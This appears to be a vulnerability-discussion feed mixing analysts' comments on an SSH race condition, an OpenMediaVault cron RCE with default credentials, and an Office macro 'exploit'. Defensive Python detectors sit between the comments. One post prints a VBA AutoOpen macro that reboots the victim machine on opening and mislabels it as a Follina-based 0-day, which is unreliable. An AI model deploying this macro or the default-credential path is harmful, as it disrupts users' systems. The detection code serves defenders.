Activity Feed
@cschie822_comcast it depends on whether one means the attacker value in case of successful exploitation (which is very high here) or the global attacker value taking every other metric into account, such as the very difficult exploitability (the value is very low). So it depends on whether it is contextualized or not.
Technical Analysis
CVE-2024-30104
The problem is still in the “docx” files; this vulnerability is a 0-day based on the Follina exploit. Microsoft still doesn’t want to understand that they MUST remove the macro option from Office 365 and their offline app. In this video, you will see an example of how some users can be tricked into opening the malicious file that is sent to them by the attacker. After execution of the file, things will be very bad for the users who execute it on their computer. It depends on the scenario.
The exploit:
    Sub AutoOpen()
        Dim Program As String
        Dim TaskID As Double
        On Error Resume Next
        Program = "shutdown /R"
        TaskID = Shell(Program, 1)
        If Err <> 0 Then
            MsgBox "Can't start " & Program
        End If
    End Sub
- Enjoy watching
Source:
PoC:
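The post above relies on a VBA project embedded in an Office document. As an added example (not code from the post), this Python triage check opens an OOXML container, reports whether it carries a vbaProject.bin part and lists any auto-execute procedure names visible in it; the sample documents are constructed in memory, and the stand-in macro part is an assumption, not a real VBA stream.

```python
import io
import re
import zipfile

# OOXML (docx/docm/xlsm/pptm) is a ZIP; macro code lives in a binary part whose
# name ends in vbaProject.bin. AutoOpen / Auto_Open / Document_Open / Workbook_Open
# are the procedure names Word and Excel run on open without user interaction.
AUTO_EXEC_NAMES = re.compile(rb"AutoOpen|Auto_Open|Document_Open|Workbook_Open", re.I)


def inspect_office_file(data: bytes) -> dict:
    """Return {'has_macros', 'auto_exec', 'vba_parts'} for an OOXML blob.

    Module source inside vbaProject.bin is MS-OVBA compressed, so the raw byte
    scan for procedure names is only a hint; the presence of the part itself
    (has_macros) is the reliable signal for a document that can carry macros.
    """
    findings = {"has_macros": False, "auto_exec": [], "vba_parts": []}
    try:
        zf = zipfile.ZipFile(io.BytesIO(data))
    except zipfile.BadZipFile:
        findings["error"] = "not an OOXML zip container"
        return findings
    for name in zf.namelist():
        if name.lower().endswith("vbaproject.bin"):
            findings["has_macros"] = True
            findings["vba_parts"].append(name)
            blob = zf.read(name)
            findings["auto_exec"] += sorted({m.decode() for m in AUTO_EXEC_NAMES.findall(blob)})
    return findings


def build_sample(with_macro: bool) -> bytes:
    """Construct a minimal docx-like zip; the macro part is a constructed stand-in."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w") as zf:
        zf.writestr("[Content_Types].xml", "<Types/>")
        zf.writestr("word/document.xml", "<w:document/>")
        if with_macro:
            zf.writestr("word/vbaProject.bin", b"\x00\x01dir\x00AutoOpen\x00Sub AutoOpen()")
    return buf.getvalue()


if __name__ == "__main__":
    print(inspect_office_file(build_sample(True)))
    print(inspect_office_file(build_sample(False)))
```

Run it over a mail gateway's attachment quarantine to flag documents that should be blocked or sandboxed before a user can open them.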
Technical Analysis
While this vulnerability is interesting, and it certainly has the potential for immense damage and harm, the reality is far more nuanced. The difficulty in exploiting this vulnerability is significant, and the attacker will likely have to generate a lot of noise. It takes a matter of hours (the quickest to date has been around 4 hours under lab conditions) to successfully exploit, which generates a lot of traffic and noise that for the most part will not go unnoticed if an organisation has the appropriate monitoring in place.
In addition, this is not vulnerable on numerous LTS-based operating systems such as:
- RHEL (and thus CentOS) 6, 7, 8 (https://access.redhat.com/security/cve/CVE-2024-6387)
- Ubuntu bionic, focal, trusty (https://access.redhat.com/security/cve/CVE-2024-6387)
Technical Analysis
This is a golden oldie that has never been fixed. The existing module in Metasploit, exploit/multi/http/openmediavault_cmd_exec, works only on versions in the range 0.4.x. Unfortunately the vulnerability still exists within all OpenMediaVault versions starting from 0.5 until the recent release 7.4.2-2, and it allows an authenticated user to create and run cron jobs as root on the system.
I have created a new Metasploit module that can handle all targets from versions 0.1 and above. Shodan shows more than 10000 vulnerable instances and hundreds of them still have the default admin:openmediavault credentials configured, which allows an attacker to leverage this exploit.
This module has been successfully tested on:
OpenMediaVault x64 appliances:
- openmediavault_0.2_amd64.iso
- openmediavault_0.2.5_amd64.iso
- openmediavault_0.3_amd64.iso
- openmediavault_0.4_amd64.iso
- openmediavault_0.4.32_amd64.iso
- openmediavault_0.5.0.24_amd64.iso
- openmediavault_0.5.48_amd64.iso
- openmediavault_1.9_amd64.iso
- openmediavault_2.0.13_amd64.iso
- openmediavault_2.1_amd64.iso
- openmediavault_3.0.2-amd64.iso
- openmediavault_3.0.26-amd64.iso
- openmediavault_3.0.74-amd64.iso
- openmediavault_4.0.9-amd64.iso
- openmediavault_4.1.3-amd64.iso
- openmediavault_5.0.5-amd64.iso
- openmediavault_5.5.11-amd64.iso
- openmediavault_5.6.13-amd64.iso
- openmediavault_6.0-16-amd64.iso
- openmediavault_6.0-34-amd64.iso
- openmediavault_6.0-amd64.iso
- openmediavault_6.0.24-amd64.iso
- openmediavault_6.5.0-amd64.iso
- openmediavault_7.0-20-amd64.iso
- openmediavault_7.0-32-amd64.iso
ARM64 on Raspberry PI running Kali Linux 2024-3:
- openmediavault 7.3.0-5
- openmediavault 7.4.2-2
VirtualBox Images (x64):
- openmediavault 0.4.24
- openmediavault 0.5.30
- openmediavault 1.0.21
You can download the ISO images from here.
Mitigation
There is no fix available to address this vulnerability. This weakness has been there since 2013 and has never been fixed. Future releases will probably not fix it. I contacted the lead developer, but did not get any response. The only precaution that you can take is to ensure that you change the default admin credentials. It is not enforced, so you need to take the action yourself.
References
CVE-2013-3632
Packetstorm Public Exploit
Metasploit Module – OpenMediaVault authenticated RCE
OpenMediaVault ISO Downloads
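The weakness above leaves a concrete artefact behind: a new cron job running as root. As an added example (not the analysis author's module or any OpenMediaVault code), this Python baseline check parses system-crontab text in the /etc/cron.d format, which carries a user field, and reports root jobs that were not present in an earlier snapshot. The crontab contents are constructed samples, and the idea that OpenMediaVault writes user-defined jobs under /etc/cron.d is an assumption about where to point it.

```python
import re

# /etc/cron.d lines: five schedule fields (or an @keyword), then user, then command.
CRON_D_RE = re.compile(
    r"^(?P<sched>(?:@\w+|(?:\S+\s+){5}))\s*(?P<user>\S+)\s+(?P<cmd>.+)$"
)


def parse_cron_d(text):
    """Return (user, schedule, command) tuples, skipping comments and VAR=value lines."""
    jobs = []
    for raw in text.splitlines():
        line = raw.strip()
        if not line or line.startswith("#") or "=" in line.split()[0]:
            continue
        m = CRON_D_RE.match(line)
        if m:
            jobs.append((m["user"], m["sched"].strip(), m["cmd"].strip()))
    return jobs


def new_root_jobs(baseline_text, current_text):
    """Root jobs present in the current file but absent from the baseline snapshot."""
    base = set(parse_cron_d(baseline_text))
    return [j for j in parse_cron_d(current_text) if j[0] == "root" and j not in base]


# Constructed samples: a known-good snapshot taken at deployment time, and the
# same file after someone with the web UI's credentials added two jobs.
BASELINE = """# openmediavault user-defined jobs (constructed sample, not a real file)
SHELL=/bin/sh
PATH=/usr/local/sbin:/usr/local/bin:/sbin:/bin:/usr/sbin:/usr/bin
0 3 * * * root /usr/local/bin/nightly-backup.sh
"""
CURRENT = BASELINE + """* * * * * root /usr/bin/python3 /tmp/.x.py
@reboot admin /usr/bin/true
"""

if __name__ == "__main__":
    for user, sched, cmd in new_root_jobs(BASELINE, CURRENT):
        print(f"NEW ROOT JOB: [{sched}] {cmd}")
```

Snapshot the file once after changing the default credentials; any root entry that later shows up outside a change window deserves a look at the web UI's access log for the same period.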
Technical Analysis
TL;DR: Neat! Doesn’t sound like something that’s going to be easily exploited or automated in pretty much any scenario, so I have little initial concern about widespread exploitation, or even exploitation at all. I’d expect a long tail of follow-on patches as various distros/products patch it out. Patch, sure, but no need for panic as far as we can tell.
As usual, happy to be proven wrong, but from the (very good!) Qualys technical write-up, this is a memory corruption bug where an adversary would have to win a race condition to exploit it successfully. The Qualys write-up even explicitly notes that “In our experiments, it takes ~10,000 tries on average to win this race condition; i.e., with 10 connections (MaxStartups) accepted per 120 seconds (LoginGraceTime), it takes ~1-2 days on average to obtain a remote root shell.”
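Both the analysis above and the earlier one about the noise this bug generates describe the same observable: one source opening connection after connection, each hitting LoginGraceTime without ever authenticating. As an added example (not from either analyst, and not Qualys' code), this Python script turns the quoted figures into an expected attack duration and runs a per-source rate check over constructed sshd log lines; the log wording and threshold are assumptions to tune against your own hosts.

```python
import re
from collections import defaultdict, deque
from datetime import datetime

# Assumed syslog-style line, matching OpenSSH's grace-timeout message wording.
LINE_RE = re.compile(
    r"^(?P<ts>\w{3}\s+\d+ \d\d:\d\d:\d\d) \S+ sshd\[\d+\]: "
    r"Timeout before authentication for (?P<ip>[\d.]+) port \d+"
)


def expected_attack_seconds(tries=10_000, max_startups=10, login_grace=120):
    """Race attempts are rate-limited by MaxStartups per LoginGraceTime; defaults give ~1.4 days."""
    return tries / max_startups * login_grace


def find_grace_timeout_bursts(lines, window_s=600, threshold=20, year=2024):
    """Return {ip: peak count} for sources with >= threshold auth timeouts inside any window_s span."""
    seen = defaultdict(deque)
    flagged = {}
    for line in lines:
        m = LINE_RE.match(line)
        if not m:
            continue
        ts = datetime.strptime(f"{year} {m['ts']}", "%Y %b %d %H:%M:%S")
        q = seen[m["ip"]]
        q.append(ts)
        while (ts - q[0]).total_seconds() > window_s:
            q.popleft()  # slide the window
        if len(q) >= threshold:
            flagged[m["ip"]] = max(flagged.get(m["ip"], 0), len(q))
    return flagged


def constructed_log(ip="203.0.113.7", n=25):
    """Constructed sample: n timeouts 20 s apart from one source, plus one benign stray."""
    out = []
    for i in range(n):
        t = i * 20
        out.append(f"Jul  1 02:{t // 60:02d}:{t % 60:02d} bastion sshd[{4000 + i}]: "
                   f"Timeout before authentication for {ip} port {50000 + i}")
    out.append("Jul  1 02:05:11 bastion sshd[4999]: Timeout before authentication for 198.51.100.9 port 40111")
    return out


if __name__ == "__main__":
    print(f"expected time at quoted defaults: {expected_attack_seconds() / 86400:.2f} days")
    print(find_grace_timeout_bursts(constructed_log()))
```

A legitimate client rarely produces more than a handful of these in ten minutes, so a sustained burst from one address is worth blocking at the perimeter long before the attacker's day-scale budget runs out.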
Technical Analysis
Based on our AttackerKB Rapid7 Analysis, I have rated the exploitability as high, as an exploit can easily be implemented by modifying an existing SFTP library to trigger the auth bypass. However, when running the exploit, the attacker must first know the username of a valid user account on the target server. I have rated the attacker value as very high, as this is an auth bypass in an SFTP service of an enterprise file transfer solution.
What @noraj said! If successfully exploited, it most likely gives root access to the system, which is about as good as it gets for an attacker. But the effort required to do so is significant, making the chances of successful exploitation very low. So from a risk perspective (risk = impact * likelihood), where the impact (attacker value) is incredibly high but the likelihood (exploitability) is very low, that puts it at about medium risk.